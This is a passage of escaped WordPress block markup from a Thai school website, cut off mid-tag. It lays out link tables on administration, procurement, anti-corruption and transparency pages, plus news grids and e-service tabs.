{\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a 